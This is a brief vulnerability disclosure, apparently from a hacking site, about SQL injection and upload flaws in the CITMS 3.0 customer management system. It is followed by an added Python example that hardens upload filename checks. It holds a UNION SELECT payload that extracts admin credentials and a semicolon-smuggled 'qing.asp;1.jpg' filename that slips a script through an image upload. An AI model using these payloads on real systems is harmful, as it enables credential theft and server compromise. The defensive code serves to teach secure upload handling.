Company customer information and tracking management system CITMS 3.0: injection and upload vulnerabilities

ID MYHACK58:62201234962
Type myhack58
Reporter Anonymous
Modified 2012-09-19T00:00:00


Some of the management system's functions are as follows:

(1) Add, modify and delete administrators online

(2) Add, modify and delete customer records online, with support for HTML, etc.

(3) Front-end records with a tracking function, as well as display of the tracking records and the number of clicks

Source code download:

Injection: union select 1,name,3,pass,,5,6,7,8,9,10,11,12,13,14,15,16 from admin


Upload: uploading qing.asp;1.jpg succeeds, and the resulting file name is: qing.asp;<random number>.jpg

For example: ;131672.jpg
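The upload result above shows the stored name keeping the client-supplied `qing.asp;` prefix, with only the trailing part randomized. The following is an added example of a hardened naming check, not code from the original page or from CITMS; the function name `stored_upload_name`, the extension allowlist and the sample inputs are assumptions made for illustration.

```python
import os
import re
import secrets

# Assumed allowlist of image types (the page only shows a .jpg upload).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Client names: letters, digits, '_' and '-', then exactly one dot and extension.
SAFE_CLIENT_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")


def stored_upload_name(client_name: str, content: bytes) -> str:
    """Validate an upload and return a server-generated storage name.

    Raises ValueError when the client name or the content is unacceptable.
    """
    # Drop any directory part sent by the client (both separator styles).
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # fullmatch rejects ';', extra dots, spaces, NUL and trailing newlines,
    # so a name such as 'qing.asp;1.jpg' fails here.
    if not SAFE_CLIENT_NAME.fullmatch(base):
        raise ValueError("unacceptable file name")
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        raise ValueError("extension not allowed")
    # The leading bytes must agree with the claimed image type.
    if not content.startswith(MAGIC[ext]):
        raise ValueError("content does not match extension")
    # Nothing from the client name survives except the allowlisted extension.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    sample_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 8  # constructed sample bytes
    for name in ("photo.jpg", "qing.asp;1.jpg"):  # constructed sample names
        try:
            print(name, "->", stored_upload_name(name, sample_jpeg))
        except ValueError as err:
            print(name, "-> rejected:", err)
```

Storing uploads in a directory where the web server has script execution disabled complements this check.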